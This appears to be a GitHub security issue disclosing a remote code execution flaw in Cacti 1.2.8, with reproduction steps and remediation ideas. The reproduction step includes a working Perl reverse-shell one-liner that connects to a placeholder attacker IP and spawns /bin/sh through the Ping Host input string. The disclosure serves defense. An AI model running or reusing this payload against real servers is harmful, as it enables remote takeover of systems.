Skip to content

Critical vulnerability: Remote Code Execution via string/command type Input String #3186

Closed
@0xfatty

Description

@0xfatty

Describe the bug
Input validation error in data_input.php leads to Remote Code Execution via Input String (Script/Command) edit actions. By default, Cacti was installed with several Data Input Methods. Some of them was created using Script/Command input type. An attacker will be able to edit the Input String to insert malicious code and take control of the server.

Cacti version: Latest (1.2.8)

To Reproduce
Steps to reproduce the behavior:

  1. After logged in, navigate to Data Collection -> Data Input Methods -> Unix - Ping Host
  2. By default, Input String was specified as: perl <path_cacti>/scripts/ping.pl <hostname>. Let's append a malicious perl script in front of current script:

perl -e 'use Socket;$i="**ACTTACKER-IP**";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; perl <path_cacti>/scripts/ping.pl <hostname>

  1. By default, Unix -Ping Host data input method is being used by Unix - Ping Latency Graph template. This means we can create Unix - Ping Latency in current device and gain Remote Code Execution

Expected behavior

  • By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended into the Input String, the server will make a call back to Attacker's machine first.

Impact

  • The vulnerability would let an authorized user take control of the server. Attack will then be able to take down the system as well as use the system for malicious purposes.

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

  • OS: Kali Linux, Ubuntu
  • Browser : Firefox, Chrome
  • Version: Firefox 72.0, Chrome 79.0.3945.117

Remediation

  • I would think about two (2) solutions:
    1 - Using regex to catch all other strings different from expected string
    2 - Hard-coding perl script into source-code and force the application to take only 1 filtered input (hostname).

Chi Tran
research@ctrsec.io

Metadata

Metadata

Assignees

Labels

SECURITYA security issue reported through CVEinstallerInstallation issue

Type

No type

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions